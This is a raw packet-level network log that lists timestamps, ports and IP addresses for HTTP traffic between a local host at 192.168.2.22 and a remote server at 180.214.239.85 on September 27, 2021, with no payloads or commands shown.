Sep 27, 2021 14:04:15.781125069 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.781131029 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.781142950 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.781173944 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.781182051 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.781193972 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.781255960 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.781266928 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.781302929 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.781303883 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.781339884 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.781347036 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.781366110 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.781380892 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.781388998 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.781398058 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.781428099 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.782166958 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.782198906 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.782222033 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.782247066 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.782255888 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.782279968 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.782896042 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.782958031 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.783081055 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.783129930 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.783138037 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.783159971 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.783176899 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.783200026 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.793256044 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.793303013 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.793346882 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.793364048 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.793392897 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.793426037 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.794481993 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.794518948 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.794528961 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.794548035 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.794557095 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.794579983 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.794588089 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.794605970 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.794614077 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.794630051 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.794639111 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.794651031 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.794658899 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.794683933 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.794706106 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.794739962 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.794775009 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.794811010 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.794827938 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.794858932 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.794866085 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.794888973 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.794894934 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.794920921 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.794958115 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.795008898 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.795103073 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.795155048 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.795171976 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.795196056 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.795217037 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.795217991 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.795239925 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.795262098 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.795264959 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.795285940 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.795299053 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.795306921 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.795315027 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.795329094 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.795345068 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.795351028 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.795368910 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.795377016 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.795387030 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.795398951 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.795412064 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.795420885 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.795439005 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.795447111 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.795454979 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.795474052 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.798067093 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.798098087 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.798124075 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.798135042 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.798146009 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.798162937 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.798166990 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.798176050 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.798182011 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.798213005 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.798238039 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.798259974 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.798268080 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.798305035 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.798362970 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.798386097 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.798408031 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.798408031 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.798419952 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.798429966 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.798441887 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.798461914 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.798479080 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.798511982 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.798583984 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.798605919 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.798614979 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.798624992 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.798641920 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.798660040 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.798721075 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.798743963 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.798753023 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.798774958 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.798820972 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.798851013 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.798930883 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.799006939 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.799036026 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.799060106 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.799069881 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.799083948 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.800026894 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.800043106 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.800054073 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.800081968 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.800103903 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.800107002 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.800128937 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.800152063 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.800173044 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.800196886 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.800198078 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.800213099 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.800215960 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.800236940 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.800239086 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.800254107 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.800257921 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.800273895 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.800276041 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.800292969 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.800295115 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.800311089 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.800314903 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.800329924 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.800334930 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.800345898 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.800357103 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.800362110 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.800379992 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.800390005 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.800400972 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.800416946 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.800424099 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.800431967 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.800446033 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.800457954 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.800467968 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:15.800479889 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:15.800493956 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.140003920 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.140048981 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.140073061 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.140094995 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.140105963 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.140137911 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.140141964 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.142345905 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.142391920 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.143913984 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144180059 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144181967 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144208908 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144210100 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144213915 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144224882 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144241095 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144248009 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144270897 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144284010 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144296885 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144311905 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144325972 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144336939 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144352913 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144367933 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144378901 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144398928 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144406080 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144418001 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144433022 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144447088 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144464016 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144469976 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144491911 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144505978 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144515038 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144535065 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144540071 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144551992 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144565105 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144579887 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144587994 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144599915 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144615889 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144629955 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144639969 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144655943 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144670010 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144679070 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144695997 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144711018 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144721985 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144730091 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144747019 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144761086 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144773006 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144783974 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144798040 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144813061 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144824028 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144839048 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144850016 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144860029 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144877911 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144891977 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144906044 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144918919 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144932985 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144948006 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144958973 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144967079 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.144984961 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.144999027 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.145006895 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.145018101 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.145029068 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.145047903 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.145052910 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.145066023 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.145077944 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.145097971 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.145104885 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.145116091 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.145128012 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.145148039 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.145153999 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.145164967 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.145175934 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.145196915 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.145199060 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.145212889 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.145220995 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.145235062 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.145258904 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.147686005 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.154396057 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.154436111 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.154454947 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.154479027 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.154501915 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.154525042 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.154565096 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.154589891 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.154589891 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.154620886 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.154623985 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.154639006 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.155610085 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.155642986 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.155689001 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.155704975 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.155708075 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.155710936 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.155731916 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.155754089 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.155755043 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.155774117 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.155791044 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.156810999 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.156845093 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.156891108 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.156896114 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.156920910 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.156929016 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.156941891 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.156958103 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.159460068 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.159502983 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.159539938 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.159553051 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.159563065 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.159594059 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.159612894 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.159641981 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.159670115 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.159687996 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.159701109 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.159713030 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.159727097 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.159735918 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.159754992 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.159758091 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.159778118 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.159781933 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.159797907 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.159804106 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.159813881 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.159826040 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.159845114 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.159846067 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.159868002 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.159885883 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.159897089 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.159909010 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.159929037 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.159929991 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.159946918 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.159951925 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.159966946 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.159976006 CEST	80	49165	180.214.239.85	192.168.2.22
Sep 27, 2021 14:04:16.159985065 CEST	49165	80	192.168.2.22	180.214.239.85
Sep 27, 2021 14:04:16.159998894 CEST	80	49165	180.214.239.85	192.168.2.22
